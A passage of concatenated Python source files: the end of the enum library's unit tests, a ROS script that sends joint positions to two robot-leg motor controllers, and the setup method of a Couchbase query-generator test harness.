# only 248 composite pseudo-members were created (256 distinct values seen)
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
X = 1 << 0
W = 1 << 1
R = 1 << 2
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_type(self):
Perm = self.Perm
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm.R | 8), 'Perm.8|R')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(Perm(8)), 'Perm.8')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8')
self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
self.assertEqual(str(Perm(~8)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(Open(4)), 'Open.4')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(8)), '<Perm.8: 8>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>')
self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>')
self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(Open(4)), '<Open.4: 4>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>')
self.assertEqual(repr(~Open.AC), '<Open.CE: -4>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>')
self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>')
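# Unlike plain Flag above, where ~Perm.R is reduced to the remaining defined
# bits (value 3 in TestFlag.test_repr), IntFlag keeps the underlying int's
# two's-complement result, so ~Perm.R reports value -5 here.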
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, ~i.value)
self.assertEqual((~i).value, ~i.value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
'GREEN' in Color
with self.assertRaises(TypeError):
'RW' in Open
with self.assertRaises(TypeError):
2 in Color
with self.assertRaises(TypeError):
2 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.PURPLE), [Color.BLUE, Color.RED])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that no thread failed and that, besides the 8 canonical members,
# only 248 composite pseudo-members were created (256 distinct values seen)
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@unique
class Silly(Enum):
one = 1
two = 'dos'
name = 3
@unique
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumMeta:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumMeta),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(values.keys(), result.keys())
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumMeta),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumMeta, object=EnumMeta.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum)
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexicographical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(sys.version_info[:2] == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(sys.version_info >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
if __name__ == '__main__':
unittest.main()
|
actuator_controller.py
|
#!/usr/bin/python3 -B
import time
import math
from aoyun_fdcanusb.moteusController import Controller
from aoyun_fdcanusb.moteusReg import MoteusReg
import rospy
from std_msgs.msg import String
from sensor_msgs.msg import JointState
import threading
def thread_job():
rospy.spin()
positions = [0 for _ in range(12)]
def save_position(data):
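# /joint_states callback: cache the latest 12 joint positions, scaled by 1/pi,
# so the control loop in main() can stream them to the moteus controllers.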
global positions
for i in range(12):
positions[i] = (data.position[i] / math.pi)
# rospy.loginfo('positions[%d]: %f; data.position[%d] %f', i, positions[i], i, data.position[i])
def listener():
rospy.init_node('ayspot_a1_hw_pylistener', anonymous=True)
add_thread = threading.Thread(target = thread_job)
add_thread.start()
rospy.Subscriber('/joint_states', JointState, save_position, queue_size=1)
rospy.sleep(1)
def main():
global positions
# controller_hip_lf = Controller(controller_ID = 3)
# controller_thigh_lf = Controller(controller_ID = 1)
# controller_shank_lf = Controller(controller_ID = 2)
# controller_hip_rf = Controller(controller_ID = 6)
controller_thigh_rf = Controller(controller_ID = 4)
controller_shank_rf = Controller(controller_ID = 5)
# controller_hip_lh = Controller(controller_ID = 9)
# controller_thigh_lh = Controller(controller_ID = 7)
# controller_shank_lh = Controller(controller_ID = 8)
# controller_hip_rh = Controller(controller_ID = 12)
# controller_thigh_rh = Controller(controller_ID = 10)
# controller_shank_rh = Controller(controller_ID = 11)
listener()
jump_torque = 2
freq = 200
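# Fixed-rate command loop: each iteration measures how long the set_position
# calls took and sleeps for the remainder of the 1/freq period, so joint
# targets are sent at roughly freq Hz.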
while True:
# hip_lf = positions[0]
# thigh_lf = positions[1]
# shank_lf = positions[2]
# hip_rf = positions[3]
thigh_rf = positions[4] - (0.25214188/2.0)
shank_rf = positions[5]
# hip_lh = positions[6]
# thigh_lh = positions[7]
# shank_lh = positions[8]
# hip_rh = positions[9]
# thigh_rh = positions[10]
# shank_rh = positions[11]
freq_measure_time = time.time()
phase = (time.time() * 1) % (2. * math.pi)  # phase signal, currently unused by the commands below
# controller_hip_lf.set_position(position=hip_lf, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_thigh_lf.set_position(position=thigh_lf, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_shank_lf.set_position(position=shank_lf, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_hip_rf.set_position(position=hip_rf, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
controller_thigh_rf.set_position(position=thigh_rf, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
controller_shank_rf.set_position(position=shank_rf, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_hip_lh.set_position(position=hip_lh, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_thigh_lh.set_position(position=thigh_lh, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_shank_lh.set_position(position=shank_lh, max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_hip_rh.set_position(position=positions[9], max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_thigh_rh.set_position(position=positions[10], max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
# controller_shank_rh.set_position(position=positions[11], max_torque=jump_torque, kd_scale=5, get_data=True, print_data=False)
sleep_time = max(0.0, (1.0 / freq) - (time.time() - freq_measure_time))
time.sleep(sleep_time)
if __name__=='__main__':
main()
|
base_test_rqg.py
|
import paramiko
from basetestcase import BaseTestCase
import os
import zipfile
import queue
import json
import threading
from memcached.helper.data_helper import VBucketAwareMemcached
from .rqg_mysql_client import RQGMySQLClient
from membase.api.rest_client import RestConnection, Bucket
from couchbase_helper.tuq_helper import N1QLHelper
from .rqg_query_helper import RQGQueryHelper
from remote.remote_util import RemoteMachineShellConnection
import random
from itertools import combinations
import shutil
from os import listdir
from os.path import isfile, join
import traceback
from .rqg_postgres_client import RQGPostgresClient
from membase.api.exception import CBQError
from fts.random_query_generator.rand_query_gen import FTSFlexQueryGenerator
from pytests.fts.fts_base import FTSIndex
from pytests.fts.random_query_generator.rand_query_gen import DATASET
from deepdiff import DeepDiff
from pytests.fts.fts_base import CouchbaseCluster
import uuid
import re
class BaseRQGTests(BaseTestCase):
def setUp(self):
try:
super(BaseRQGTests, self).setUp()
self.log.info("============== RQG Setup Has Started ==============")
self.client_map = {}
self.check_covering_index = self.input.param("check_covering_index", True)
self.skip_setup_cleanup = True
self.crud_ops = self.input.param("crud_ops", False)
self.use_fts = self.input.param("use_fts", False)
self.use_sdk = self.input.param("use_sdk", False)
self.use_analytics = self.input.param("use_analytics", False)
self.shell = RemoteMachineShellConnection(self.master)
self.ansi_joins = self.input.param("ansi_joins", False)
self.with_let = self.input.param("with_let", False)
self.ansi_transform = self.input.param("ansi_transform", False)
self.prepared = self.input.param("prepared", False)
self.hash_joins = self.input.param("hash_joins", False)
self.create_secondary_meta_indexes = self.input.param("create_secondary_meta_indexes", False)
self.aggregate_pushdown = self.input.param("aggregate_pushdown", False)
self.create_secondary_ansi_join_indexes = self.input.param("create_secondary_ansi_join_indexes", False)
self.remove_alias = self.input.param("remove_alias", True)
self.skip_cleanup = self.input.param("skip_cleanup", False)
self.build_secondary_index_in_seq = self.input.param("build_secondary_index_in_seq", False)
self.number_of_buckets = self.input.param("number_of_buckets", 5)
self.crud_type = self.input.param("crud_type", "update")
self.populate_with_replay = self.input.param("populate_with_replay", False)
self.use_default_collection = self.input.param("use_default_collection", False)
self.use_query_context = self.input.param("use_query_context", False)
self.crud_batch_size = self.input.param("crud_batch_size", 1)
self.record_failure = self.input.param("record_failure", False)
self.failure_record_path = self.input.param("failure_record_path", "/tmp")
self.use_mysql = self.input.param("use_mysql", False)
self.use_postgres = self.input.param("use_postgres", False)
self.initial_loading_to_cb = self.input.param("initial_loading_to_cb", True)
self.change_bucket_properties = self.input.param("change_bucket_properties", False)
self.database = self.input.param("database", "flightstats")
self.merge_operation = self.input.param("merge_operation", False)
self.load_copy_table = self.input.param("load_copy_table", False)
self.user_id = self.input.param("user_id", "root")
self.user_cluster = self.input.param("user_cluster", "Administrator")
self.password = self.input.param("password", "")
self.password_cluster = self.input.param("password_cluster", "password")
self.generate_input_only = self.input.param("generate_input_only", False)
self.using_gsi = self.input.param("using_gsi", True)
self.use_txns = self.input.param("use_txns", False)
self.num_txns = self.input.param("num_txns", 1)
self.reset_database = self.input.param("reset_database", True)
self.create_primary_index = self.input.param("create_primary_index", False)
self.create_secondary_indexes = self.input.param("create_secondary_indexes", False)
self.use_advisor = self.input.param("use_advisor", False)
self.items = self.input.param("items", 1000)
self.mysql_url = self.input.param("mysql_url", "localhost")
self.mysql_url = self.mysql_url.replace("_", ".")
self.gen_secondary_indexes = self.input.param("gen_secondary_indexes", False)
self.gen_gsi_indexes = self.input.param("gen_gsi_indexes", True)
self.n1ql_server = self.get_nodes_from_services_map(service_type="n1ql")
self.create_all_indexes = self.input.param("create_all_indexes", False)
self.concurreny_count = self.input.param("concurreny_count", 10)
self.total_queries = self.input.param("total_queries", None)
self.run_query_without_index_hint = self.input.param("run_query_without_index_hint", True)
self.run_query_with_primary = self.input.param("run_query_with_primary", False)
self.run_query_with_secondary = self.input.param("run_query_with_secondary", False)
self.run_explain_with_hints = self.input.param("run_explain_with_hints", False)
self.test_file_path = self.input.param("test_file_path", None)
self.secondary_index_info_path = self.input.param("secondary_index_info_path", None)
self.db_dump_path = self.input.param("db_dump_path", None)
self.input_rqg_path = self.input.param("input_rqg_path", None)
self.set_limit = self.input.param("set_limit", 0)
self.build_index_batch_size = self.input.param("build_index_batch_size", 1000)
self.query_count = 0
self.use_rest = self.input.param("use_rest", True)
self.ram_quota = self.input.param("ram_quota", 512)
self.drop_index = self.input.param("drop_index", False)
self.drop_bucket = self.input.param("drop_bucket", False)
self.dynamic_indexing = self.input.param("dynamic_indexing", False)
self.partitioned_indexes = self.input.param("partitioned_indexes", False)
self.pushdown = self.input.param("pushdown", False)
self.subquery = self.input.param("subquery", False)
self.drop_secondary_indexes = self.input.param("drop_secondary_indexes", True)
self.query_helper = self._initialize_rqg_query_helper()
self.n1ql_helper = self._initialize_n1ql_helper()
self.rest = RestConnection(self.master)
self.indexer_memQuota = self.input.param("indexer_memQuota", 1024)
self.teardown_mysql = self.use_mysql and self.reset_database and (not self.skip_cleanup)
self.keyword_list = self.query_helper._read_keywords_from_file("b/resources/rqg/n1ql_info/keywords.txt")
self.use_secondary_index = self.run_query_with_secondary or self.run_explain_with_hints
self.check_explain_plan = self.input.param("explain_plan", False)
self.index_limit = self.input.param("index_limit", 5)
self.float_round_level = self.input.param("float_round_level", 0)
self.delta = self.input.param("delta", 0)
self.window_function_test = self.input.param("window_function_test", False)
self.randomize = self.input.param("randomize", False)
self.advise_server = self.input.advisor
